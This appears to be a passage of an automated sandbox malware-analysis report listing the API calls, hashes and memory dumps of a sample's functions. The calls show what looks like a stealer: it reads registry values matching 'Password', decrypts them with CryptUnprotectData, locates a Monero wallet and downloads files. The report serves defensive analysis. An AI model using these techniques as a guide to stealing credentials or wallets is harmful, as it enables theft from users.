                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: e0b8df745acab5899ec1379d0a7a6af04e48aef6e2e6be537388b1f5a34b7927
                                  • Instruction ID: 3fbffb8fe97f9e84ebada72c4952c1049f9f5e9505d76146fb2fa1bafc5770c2
                                  • Opcode Fuzzy Hash: e0b8df745acab5899ec1379d0a7a6af04e48aef6e2e6be537388b1f5a34b7927
                                  • Instruction Fuzzy Hash: 76618F71D1012CABCB56DB64CC54AEE77B9BF48301F1489A9B609A7290DF70AF858F90
                                  Function 003E6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6AFF
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E6B2C
                                  • StrCmpCA.SHLWAPI(?,011B0C60), ref: 003E6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 003E6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003E6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003E6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003E6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003E6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 003E6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6C17
                                  • InternetCloseHandle.WININET(?), ref: 003E6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: 4528755e4918eb4624c890fa50a18e6c5f674e510a9fe79397d01370f27f0a1d
                                  • Instruction ID: 9533a2d5b92ed7a69fc12855c00415e6441a4fad8b513bc0fac99beebace75b0
                                  • Opcode Fuzzy Hash: 4528755e4918eb4624c890fa50a18e6c5f674e510a9fe79397d01370f27f0a1d
                                  • Instruction Fuzzy Hash: DD41CF71A00216AFDB20DF65DC86FEE77B9AB18740F048569FA05E71C0DF70AE018BA4
                                  Function 003EBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EBC1F
                                  • lstrlen.KERNEL32(00000000), ref: 003EBC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EBC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EBC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EBCAC
                                  • lstrlen.KERNEL32(00414AD4), ref: 003EBD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 0e13fda75f242e1f7fdea9ec6f8f58b6677471738bc2ea91ed017029cf2f0241
                                  • Instruction ID: a40b81be06f375885920b49b5b21947783aa1234893253a39c42f0738de7c3af
                                  • Opcode Fuzzy Hash: 0e13fda75f242e1f7fdea9ec6f8f58b6677471738bc2ea91ed017029cf2f0241
                                  • Instruction Fuzzy Hash: 0CA18E31A002558FCB23DF2ADD49AAFB7B9AF44304F19927AE406DB2A1DB71DC41CB50
                                  Function 00405EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00406014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0040609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 004060D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: b8a30549f7125f82ebddf3065f88b6765cc95b39bd6da9cf70cb5744285cce82
                                  • Instruction ID: 065cd36bab2d2b2608d7cf0192d58eda41cb0f643a02fa6dffffabe9bd4bc597
                                  • Opcode Fuzzy Hash: b8a30549f7125f82ebddf3065f88b6765cc95b39bd6da9cf70cb5744285cce82
                                  • Instruction Fuzzy Hash: AA619070700604DBDB18CF5CC991A6EB3B6EF85304B24492AE592AB3C1D739ED918B9D
                                  Function 003FE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE07D
                                  • lstrcat.KERNEL32(?,?), ref: 003FE098
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0AC
                                  • lstrcat.KERNEL32(?,0119A6E8), ref: 003FE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0D4
                                  • lstrcat.KERNEL32(?,011AF238), ref: 003FE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: cf8a405a4a12b7032187a9f4d96dcfe09ec997fede6697b434368d5cd94d6645
                                  • Instruction ID: 7e48212e5bb13925a40336c11e76da5560e9656d24a6002681ac78740e824b75
                                  • Opcode Fuzzy Hash: cf8a405a4a12b7032187a9f4d96dcfe09ec997fede6697b434368d5cd94d6645
                                  • Instruction Fuzzy Hash: E2419572D1016C9BCB26DB64DC45AEE73B9BF48300F044AA5F60997251DF709F858F90
                                  Function 003E7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003E77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003E7805
                                    • Part of subcall function 003E77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003E784A
                                    • Part of subcall function 003E77D0: StrStrA.SHLWAPI(?,Password), ref: 003E78B8
                                    • Part of subcall function 003E77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E78EC
                                    • Part of subcall function 003E77D0: HeapFree.KERNEL32(00000000), ref: 003E78F3
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003E7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 003E7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E7AF0
                                  • wsprintfA.USER32 ref: 003E7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E7B47
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003E7B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: c347c0e7f3e52b87296f9409cdbc561a2e2363657d042b4a1e0249f73f6ec5d3
                                  • Instruction ID: 1e4b1a35ef63c2acde5cc4b0fa967563955cb5a8625b9a44d81d9b339d7b1190
                                  • Opcode Fuzzy Hash: c347c0e7f3e52b87296f9409cdbc561a2e2363657d042b4a1e0249f73f6ec5d3
                                  • Instruction Fuzzy Hash: 8931D872E142A4EFCB11DBA5DC449EFB77AEF88701F29961AE50993340DB70E941C7A0
                                  Function 003F81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8243
                                  • lstrlen.KERNEL32(00000000), ref: 003F8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8297
                                  • lstrlen.KERNEL32(00000000), ref: 003F82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F82EB
                                  • lstrlen.KERNEL32(00000000), ref: 003F8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8337
                                  • lstrlen.KERNEL32(00000000), ref: 003F8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: bb5448a5a0bf5f5458866095e1e5cdcf8b3844819a6ab35d0f75b2527eec12ec
                                  • Instruction ID: 216ce059a1e694c9b067c9949bc9e26ea074e43b06a58694501b2c1bc4f2da5e
                                  • Opcode Fuzzy Hash: bb5448a5a0bf5f5458866095e1e5cdcf8b3844819a6ab35d0f75b2527eec12ec
                                  • Instruction Fuzzy Hash: 3B51CE799002169FDB1ADF39D858ABBB7A9EF00700F054625AE06DB254DF30ED61CBE0
                                  Function 003E77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003E7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003E784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003E78B8
                                    • Part of subcall function 003E7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 003E775E
                                    • Part of subcall function 003E7750: RtlAllocateHeap.NTDLL(00000000), ref: 003E7765
                                    • Part of subcall function 003E7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003E778D
                                    • Part of subcall function 003E7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003E77AD
                                    • Part of subcall function 003E7750: LocalFree.KERNEL32(?), ref: 003E77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E78EC
                                  • HeapFree.KERNEL32(00000000), ref: 003E78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 003E7A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: bc89e0e34c7214a507b0f9a0f2da342f7dc1547f2814eae6ce65ecdcc8741c26
                                  • Instruction ID: 91568060361fe5dc9c0f5ce0155b95f80ba957aa9df792c95f753aedadfdfaff
                                  • Opcode Fuzzy Hash: bc89e0e34c7214a507b0f9a0f2da342f7dc1547f2814eae6ce65ecdcc8741c26
                                  • Instruction Fuzzy Hash: C97152B1D0025DAFDB10DF95DC81ADEBBB9FF45300F14866AE509A7240EB315A85CBA1
                                  Function 003E1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003E1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003E1173
                                  • RegCloseKey.ADVAPI32(?), ref: 003E117D
                                  Strings
                                  • wallet_path, xrefs: 003E116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 003E114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 1f485c2566f246948fa1f2291c8e8bcc6410eab08cad29af3f0e2d8af0b64f70
                                  • Instruction ID: c4fae558bcf6e1723a03f28ed5895d6a60c0b39040b4700651a8624ef0fcd1d2
                                  • Opcode Fuzzy Hash: 1f485c2566f246948fa1f2291c8e8bcc6410eab08cad29af3f0e2d8af0b64f70
                                  • Instruction Fuzzy Hash: A2F09075A40308BFE7009BE0AC4DFEA7B7DEB04756F104156FF05E2290E6B05A4487A0
                                  Function 003E9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                  Download Yara Rule
                                  APIs
